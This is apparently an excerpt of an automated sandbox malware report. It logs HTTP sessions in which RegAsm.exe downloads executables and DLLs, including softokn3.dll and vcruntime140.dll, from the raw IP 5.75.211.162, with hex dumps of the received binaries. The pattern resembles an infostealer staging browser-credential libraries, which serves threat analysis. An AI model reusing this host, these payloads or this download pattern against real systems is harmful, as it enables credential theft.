2024-09-26 23:49:31 UTC	16122	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: 72 00 2d 00 62 00 61 00 00 00 68 00 72 00 2d 00 68 00 72 00 00 00 68 00 75 00 2d 00 68 00 75 00 00 00 68 00 79 00 2d 00 61 00 6d 00 00 00 69 00 64 00 2d 00 69 00 64 00 00 00 69 00 73 00 2d 00 69 00 73 00 00 00 69 00 74 00 2d 00 63 00 68 00 00 00 69 00 74 00 2d 00 69 00 74 00 00 00 6a 00 61 00 2d 00 6a 00 70 00 00 00 6b 00 61 00 2d 00 67 00 65 00 00 00 6b 00 6b 00 2d 00 6b 00 7a 00 00 00 6b 00 6e 00 2d 00 69 00 6e 00 00 00 6b 00 6f 00 2d 00 6b 00 72 00 00 00 6b 00 6f 00 6b 00 2d 00 69 00 6e 00 00 00 00 00 6b 00 79 00 2d 00 6b 00 67 00 00 00 6c 00 74 00 2d 00 6c 00 74 00 00 00 6c 00 76 00 2d 00 6c 00 76 00 00 00 6d 00 69 00 2d 00 6e 00 7a 00 00 00 6d 00 6b 00 2d 00 6d 00 6b 00 00 00 6d 00 6c 00 2d 00 69 00 6e 00 00 00 6d 00 6e 00 2d 00 6d 00 6e 00 00 00 6d Data Ascii: r-bahr-hrhu-huhy-amid-idis-isit-chit-itja-jpka-gekk-kzkn-inko-krkok-inky-kglt-ltlv-lvmi-nzmk-mkml-inmn-mnm
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: 00 00 04 00 00 00 04 8b 00 10 18 8b 00 10 78 8a 00 10 e8 7b 00 10 04 7c 00 10 00 00 00 00 d8 4c 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 f4 8a 00 10 00 00 00 00 01 00 00 00 04 00 00 00 44 8b 00 10 58 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 14 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 34 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 84 8b 00 10 98 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 34 4d 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 74 8b 00 10 00 00 00 00 00 00 00 00 00 00 00 00 58 4d 06 10 c8 8b 00 10 00 00 00 00 01 00 00 00 04 00 00 00 d8 8b 00 10 ec 8b 00 10 a0 7d 00 10 30 7d 00 10 dc 7d 00 10 00 00 00 00 58 4d 06 10 03 00 00 00 00 00 00 00 ff Data Ascii: x{\|L@DX}0}}M@4}0}}4M@tXM}0}}XM
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: d9 00 0f bf 45 fc d9 5d e8 d9 45 10 d9 45 e8 d9 c0 89 45 f4 de ea d9 c9 d9 5d e8 d9 45 e8 d9 55 10 d9 ee da e9 df e0 f6 c4 44 7b 05 dd d8 d9 45 10 8d 45 ec 50 8d 45 f8 50 d9 5d ec e8 fc fa ff ff 59 59 3b f3 0f 8c aa fd ff ff eb 10 8d 4e 01 d9 1c b7 3b cb 7d 06 d9 ee d9 5c b7 04 5e 8b c7 5f 5b c9 c3 55 8b ec 51 56 33 f6 39 75 14 7e 37 d9 ee 57 8b 7d 10 d9 04 b7 d9 5d fc d9 45 fc dd e1 df e0 dd d9 f6 c4 44 7b 1a 51 d9 1c 24 ff 75 0c ff 75 08 e8 97 fc ff ff d9 ee 83 c4 0c 46 3b 75 14 7c d2 dd d8 5f 8b 45 08 5e c9 c3 55 8b ec 51 51 8b 4d 0c 85 c9 75 04 d9 ee c9 c3 8b 55 08 83 f9 01 0f 84 9d 00 00 00 d9 02 d9 5d fc d9 45 fc d9 ee dd e1 df e0 f6 c4 44 0f 8b 82 00 00 00 d9 42 04 d9 5d fc d9 45 fc dd e1 df e0 f6 c4 44 7b 6e 83 f9 02 74 5d d9 42 08 d9 5d fc d9 45 Data Ascii: E]EEE]EUD{EEPEP]YY;N;}\^_[UQV39u~7W}]ED{Q$uuF;u\|_E^UQQMuU]EDB]ED{nt]B]E
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: 03 f7 0f b7 06 83 f8 61 74 05 83 f8 41 75 0f 03 f7 0f b7 06 66 3b c1 74 0e 66 3b c2 74 09 8b 45 08 33 db 8b 30 eb 43 03 f7 6a 04 5b 89 75 f8 66 83 3e 28 89 5d f4 75 32 8b de 03 df 68 07 01 00 00 0f b7 03 50 ff 15 ac 72 06 10 59 59 85 c0 75 e9 0f b7 03 83 f8 5f 74 e1 89 5d f8 8b 5d f4 83 f8 29 75 06 8b 75 f8 83 c6 02 8b 45 0c 85 c0 74 02 89 30 8b 45 08 5f 89 30 8b c3 5e 5b c9 c3 55 8b ec 83 ec 48 a1 c0 41 06 10 33 c5 89 45 fc 6b 4d 18 07 33 d2 8b 45 10 53 8b 5d 14 56 8b 75 0c 89 75 d0 89 45 b8 89 55 bc 89 55 c4 89 55 c0 89 4d cc 57 8b fa 83 f9 23 7e 06 6a 23 59 89 4d cc 6a 30 58 89 13 89 53 04 66 39 06 75 12 c7 45 c4 01 00 00 00 83 c6 02 66 39 06 74 f8 89 75 d0 0f b7 0e b8 b8 2d 00 10 89 4d c8 8b 4d cc c7 45 d4 16 00 00 00 8b 75 c8 66 39 30 8b 75 d0 74 0b Data Ascii: atAuf;tf;tE30Cj[uf>(]u2hPrYYu_t]])uuEt0E_0^[UHA3EkM3ES]VuuEUUUMW#~j#YMj0XSf9uEf9tu-MMEuf90ut
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: c0 75 03 8d 41 1c c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 09 e7 03 10 64 a1 00 00 00 00 50 a1 c0 41 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 e8 79 7b 00 00 50 e8 71 d8 ff ff 59 8b 40 0c 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc 55 8b ec 83 79 38 00 8b 45 08 75 03 83 c8 04 ff 75 0c 50 e8 28 00 00 00 5d c2 08 00 cc cc cc cc 55 8b ec 6a 00 ff 75 08 e8 13 00 00 00 5d c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 8b 45 08 83 ec 1c 83 e0 17 89 41 0c 8b 49 10 56 23 c8 74 43 80 7d 0c 00 75 42 f6 c1 04 74 07 be 78 54 00 10 eb 0f be 90 54 00 10 f6 c1 02 75 05 be a8 54 00 10 8d 45 f8 6a 01 50 e8 f7 13 00 00 59 59 50 56 8d 4d e4 e8 bc e2 ff ff 68 a4 1a 04 10 8d 45 e4 50 eb 09 5e c9 c2 08 00 6a 00 6a 00 e8 f0 93 02 00 cc Data Ascii: uAUjhdPA3PEdy{PqY@MdYUy8EuuP(]Uju]UEAIV#tC}uBtxTTuTEjPYYPVMhEP^jj
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: 51 56 89 45 fc 89 5f 10 e8 bd 54 02 00 8b 45 f8 83 c4 10 c6 04 1e 00 83 f8 10 72 0b 40 50 ff 37 e8 54 95 ff ff 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 b3 be ff ff cc 55 8b ec 83 ec 0c 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d fc 3b c2 72 69 8b 43 14 8d 3c 11 57 8b cb 89 45 f4 e8 88 b1 ff ff 8b f0 8d 4e 01 51 e8 b2 94 ff ff 59 ff 75 18 89 7b 10 8d 4d 0c ff 75 14 8b 7d f4 89 45 f8 89 73 14 ff 75 10 ff 75 fc 83 ff 10 72 17 8b 33 56 50 e8 6b 03 00 00 8d 47 01 50 56 e8 d2 94 ff ff 59 59 eb 07 53 50 e8 56 03 00 00 8b 45 f8 5f 89 03 8b c3 5e 5b c9 c2 14 00 e8 25 be ff ff cc 55 8b ec 83 ec 10 8b 55 08 b8 ff ff ff 7f 53 8b d9 56 57 8b 4b 10 2b c1 89 4d f0 3b c2 0f 82 8f 00 00 00 8b 43 14 8d 3c 11 57 8b cb 89 45 fc e8 f6 b0 ff ff 8b f0 8d 4e 01 Data Ascii: QVE_TEr@P7TYY7_^[UUSVWK+M;riC<WENQYu{Mu}Esuur3VPkGPVYYSPVE_^[%UUSVWK+M;C<WEN
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: 83 fe 01 75 04 3b d7 74 3a 8b 5d 08 6a 04 59 89 4d d4 53 33 c0 03 04 cb 52 13 7c cb 04 56 57 50 e8 f1 02 02 00 5b 8b 5d 08 8b f9 8b 4d d4 8b 75 d8 89 54 cb 04 8b 55 e8 89 04 cb 83 e9 01 89 4d d4 79 cf 5f 5e 5b c9 c3 55 8b ec 51 56 8b 75 14 33 d2 85 f6 7e 5f 53 8b 5d 08 29 5d 10 57 8b fb 89 75 fc 8b 5d 10 8b 0c 3b 03 0f 8b 44 3b 04 13 47 04 03 ca 89 0f 8d 7f 08 83 d0 00 8b d0 89 57 fc 83 67 fc 00 83 ee 01 75 dc 0b c6 8b 5d 08 74 22 8b 4d fc 3b 4d 0c 7d 1a 01 14 cb 8b 54 cb 04 13 d6 33 f6 89 54 cb 04 8b c2 21 74 cb 04 41 0b c6 75 e1 5f 5b 5e c9 c3 55 8b ec 8b 55 08 56 8b 75 0c 83 c2 f8 8d 14 f2 8b 02 0b 42 04 75 0b 8d 52 f8 4e 8b 0a 0b 4a 04 74 f5 8b c6 5e 5d c3 55 8b ec 53 56 33 db 33 f6 39 5d 0c 7e 30 57 8b 7d 08 ff 75 14 ff 75 10 ff 74 f7 04 ff 34 f7 e8 Data Ascii: u;t:]jYMS3R\|VWP[]MuTUMy_^[UQVu3~_S])]Wu];D;GWgu]t"M;M}T3T!tAu_[^UUVuBuRNJt^]USV339]~0W}uut4
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 7c 69 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 8b f1 89 75 fc 89 46 04 c7 06 e8 65 00 10 83 66 08 00 ff 15 d0 72 06 10 6a 00 89 46 08 ff 15 90 71 06 10 59 8b c6 5e c9 c2 08 00 56 8b f1 ff 76 0c c7 06 4c 68 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 56 8b f1 ff 76 0c c7 06 8c 66 00 10 ff 15 90 71 06 10 59 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc 56 8b f1 c7 06 50 69 00 10 e8 e2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 c7 06 90 67 00 10 e8 c2 71 00 00 c7 06 28 52 00 10 5e c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 ff 76 08 c7 06 7c Data Ascii: UQEVuF\|ifrjFqY^UQEVuFefrjFqY^VvLhqY(R^VvfqY(R^VPiq(R^Vgq(R^Vv\|
2024-09-26 23:49:31 UTC	16384	IN	Data Raw: e8 97 73 00 00 84 c0 0f 85 d3 00 00 00 8b 5d ec 80 7f 04 00 75 07 8b cf e8 85 26 00 00 0f b7 47 06 50 ff b5 74 ff ff ff e8 9a a8 ff ff 59 59 83 f8 0a 73 3c 8a 80 2c 6a 00 10 8b 4d 8c 88 85 64 ff ff ff ff b5 64 ff ff ff e8 5f 18 ff ff 8b 4d d8 8d 45 d8 83 fb 10 72 02 8b c1 80 3c 30 7f 74 4c 8d 45 d8 83 fb 10 72 02 8b c1 fe 04 30 eb 3a 8d 45 d8 83 fb 10 72 03 8b 45 d8 80 3c 30 00 74 45 80 7f 04 00 0f b7 47 06 75 0b 8b cf e8 10 26 00 00 0f b7 47 06 66 3b 85 60 ff ff ff 75 27 6a 00 8d 4d d8 e8 04 18 ff ff 46 8b 5d ec 8b cf e8 24 11 00 00 ff 75 98 8b cf e8 de 72 00 00 84 c0 0f 84 4a ff ff ff 8b 5d 90 85 f6 74 13 83 7d ec 10 8d 45 d8 72 03 8b 45 d8 80 3c 30 00 7e 52 46 8a 45 a7 83 7d d4 10 8d 55 c0 72 03 8b 55 c0 84 c0 75 49 85 f6 74 5e 8a 0a 80 f9 7f 74 57 83 Data Ascii: s]u&GPtYYs<,jMdd_MEr<0tLEr0:ErE<0tEGu&Gf;`u'jMF]$urJ]t}ErE<0~RFE}UrUuIt^tW

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.8	49724	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:32 UTC	197	OUT	GET /softokn3.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:32 UTC	262	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:32 GMT Content-Type: application/octet-stream Content-Length: 257872 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:49:32 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
2024-09-26 23:49:32 UTC	16122	IN	Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSw
2024-09-26 23:49:32 UTC	16384	IN	Data Raw: 08 c7 85 f0 fe ff ff 00 00 00 00 8d 85 ec fe ff ff 89 85 f4 fe ff ff c7 85 f8 fe ff ff 04 00 00 00 8d 85 f0 fe ff ff 6a 01 50 53 57 e8 85 af 00 00 83 c4 10 89 c6 85 c0 75 3f 8b 85 ec fe ff ff 83 c0 fd 83 f8 01 77 25 be 30 00 00 00 83 3d 28 9a 03 10 00 75 23 83 3d 50 90 03 10 00 74 0e be 01 01 00 00 f6 05 20 9a 03 10 01 74 0c 53 57 e8 e2 b9 00 00 83 c4 08 89 c6 83 3d 2c 9a 03 10 00 0f 84 5e ff ff ff 8b 85 ec fe ff ff 83 c0 fe 83 f8 02 0f 87 4c ff ff ff 56 53 57 68 85 6b 03 10 68 00 01 00 00 8d 85 f0 fe ff ff 50 ff 15 1c 7c 03 10 83 c4 18 e9 2a ff ff ff cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 14 90 03 10 31 e8 89 45 f0 c7 85 ec fe ff ff 00 00 00 00 be 30 00 00 00 83 3d 28 9a 03 10 00 74 17 8b 4d f0 31 e9 e8 28 8b 02 00 89 Data Ascii: jPSWu?w%0=(u#=Pt tSW=,^LVSWhkhP\|*USWV1E0=(tM1(
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: 40 04 03 45 dc 56 8d 4d ec 51 50 57 e8 55 9e ff ff 83 c4 10 85 c0 0f 85 6b 03 00 00 57 e8 c4 9d ff ff 83 c4 04 ff 75 e8 53 57 e8 f7 9d ff ff 83 c4 0c ff 75 e8 8d 45 e8 50 53 57 e8 26 9e ff ff 83 c4 10 85 c0 0f 85 3c 03 00 00 8b 4d c8 83 c1 01 8b 75 e4 8b 45 dc 01 f0 3b 4d c0 0f 85 6c ff ff ff 31 f6 e9 20 03 00 00 31 f6 ff 35 30 9a 03 10 ff 15 f0 7b 03 10 83 c4 04 a1 34 9a 03 10 85 c0 74 15 6a 01 50 e8 57 4e 02 00 83 c4 08 c7 05 34 9a 03 10 00 00 00 00 a1 38 9a 03 10 85 c0 74 15 6a 01 50 e8 39 4e 02 00 83 c4 08 c7 05 38 9a 03 10 00 00 00 00 a1 3c 9a 03 10 85 c0 74 15 6a 01 50 e8 1b 4e 02 00 83 c4 08 c7 05 3c 9a 03 10 00 00 00 00 56 e8 e8 4d 02 00 83 c4 04 a3 34 9a 03 10 8b 47 38 a3 40 9a 03 10 8b 47 28 a3 44 9a 03 10 8b 47 2c a3 48 9a 03 10 8d 47 04 50 e8 Data Ascii: @EVMQPWUkWuSWuEPSW&<MuE;Ml1 150{4tjPWN48tjP9N8<tjPN<VM4G8@G(DG,HGP
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: 02 10 88 41 02 0f b6 41 03 d1 e8 8a 80 68 f9 02 10 88 41 03 0f b6 41 04 d1 e8 8a 80 68 f9 02 10 88 41 04 0f b6 41 05 d1 e8 8a 80 68 f9 02 10 88 41 05 0f b6 41 06 d1 e8 8a 80 68 f9 02 10 88 41 06 0f b6 41 07 d1 e8 8a 80 68 f9 02 10 88 41 07 ba 01 01 01 01 8b 31 31 d6 33 51 04 b8 01 00 00 00 09 f2 0f 84 37 01 00 00 ba 1f 1f 1f 1f 33 11 be 0e 0e 0e 0e 33 71 04 09 d6 0f 84 20 01 00 00 ba e0 e0 e0 e0 33 11 be f1 f1 f1 f1 33 71 04 09 d6 0f 84 09 01 00 00 ba fe fe fe fe 8b 31 31 d6 33 51 04 09 f2 0f 84 f5 00 00 00 ba 01 fe 01 fe 8b 31 31 d6 33 51 04 09 f2 0f 84 e1 00 00 00 ba fe 01 fe 01 8b 31 31 d6 33 51 04 09 f2 0f 84 cd 00 00 00 ba 1f e0 1f e0 33 11 be 0e f1 0e f1 33 71 04 09 d6 0f 84 b6 00 00 00 ba e0 1f e0 1f 33 11 be f1 0e f1 0e 33 71 04 09 d6 0f 84 9f 00 Data Ascii: AAhAAhAAhAAhAAhA113Q733q 33q113Q113Q113Q33q33q
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: c0 0f 84 30 07 00 00 83 7b 08 14 0f 84 43 01 00 00 e9 21 07 00 00 3d 50 06 00 00 0f 8f aa 01 00 00 3d 51 05 00 00 74 2d 3d 52 05 00 00 74 12 3d 55 05 00 00 0f 85 0a 07 00 00 c7 47 0c 01 00 00 00 83 7b 04 00 0f 84 ec 06 00 00 83 7b 08 10 0f 85 e2 06 00 00 c7 47 18 10 00 00 00 83 7c 24 24 25 0f 85 fb 07 00 00 6a 11 ff 74 24 30 e8 44 c7 00 00 83 c4 08 85 c0 0f 84 78 09 00 00 89 c7 31 c0 81 3b 51 05 00 00 0f 95 c0 ff 77 1c 8b 4d 20 51 50 ff 73 04 ff 77 18 e8 09 1e ff ff 83 c4 14 8b 4c 24 28 89 41 64 57 e8 a9 c6 00 00 83 c4 04 8b 44 24 28 83 78 64 00 0f 84 bf 08 00 00 83 7d 20 00 b9 60 2a 00 10 ba 20 2a 00 10 0f 44 d1 89 50 74 c7 80 84 00 00 00 e0 29 00 10 e9 eb 08 00 00 3d 09 21 00 00 0f 8e 1c 02 00 00 3d 0a 21 00 00 0f 84 08 02 00 00 3d 0b 21 00 00 0f 84 23 Data Ascii: 0{C!=P=Qt-=Rt=UG{{G\|$$%jt$0Dx1;QwM QPswL$(AdWD$(xd} `* *DPt)=!=!=!#
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: 5f 5b 5d c3 cc cc 55 89 e5 53 57 56 83 ec 10 a1 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 Data Ascii: _[]USWV1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=P
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: 77 8b 75 20 85 f6 7e 7a 8b 7d 1c 83 c7 08 c7 45 d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 Data Ascii: wu ~z}EEGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZ
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: 37 ff 75 08 e8 4d 2b 00 00 83 c4 04 85 c0 74 51 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 Data Ascii: 7uM+tQH8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: 40 00 00 5d c3 b8 00 00 08 00 5d c3 cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 Data Ascii: @]]USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4
2024-09-26 23:49:33 UTC	16384	IN	Data Raw: e4 89 c7 eb 02 31 ff 8b 4d f0 31 e9 e8 15 8c 00 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 Data Ascii: 1M1<^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.8	49725	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:33 UTC	201	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:34 UTC	261	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:34 GMT Content-Type: application/octet-stream Content-Length: 80880 Connection: close Last-Modified: Thursday, 26-Sep-2024 23:49:34 GMT Cache-Control: no-store, no-cache Accept-Ranges: bytes
